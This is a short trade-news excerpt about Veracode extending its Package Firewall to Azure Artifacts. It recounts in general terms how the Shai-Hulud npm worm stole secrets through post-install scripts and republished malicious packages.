"Tim Jarrett, vice president of product at Veracode, said in the wake of a series of attacks against software supply chains using malicious code embedded in a software package that was distributed via a repository, it's clear DevSecOps teams now need a means to enforce policies that prevent developers from inadvertently downloading malicious code. The Package Firewall is designed to identify 40 to 50 indications of compromise, he added."
"The packages included a post-install script designed to harvest secrets and exfiltrate them to a GitHub repository dubbed Shai-Hulud. The most novel aspect of that cyberattack is that if a compromised package is installed in a way that provides access to npm tokens, a worm included in the code will attempt to publish malicious versions of other packages owned by the same maintainer to create additional opportunities to compromise a software supply chain."
Veracode extended its Package Firewall to Azure Artifacts, enabling enforcement of policies that limit what types of code can be downloaded from that repository. DevSecOps teams can define custom policies based on package risk profiles, vulnerability thresholds, or specific organizational security requirements. The Package Firewall is designed to identify 40 to 50 indications of compromise to prevent developers from inadvertently downloading malicious code. The Shai-Hulud supply-chain attack showed how malicious post-install scripts can harvest secrets and exfiltrate them and how worms using npm tokens can publish malicious package versions to broaden compromise. Scanning alone is insufficient; applying controls at download time offers a stronger defense while retaining open-source usage.
Read at DevOps.com
Unable to calculate read time
Collection
[
|
...
]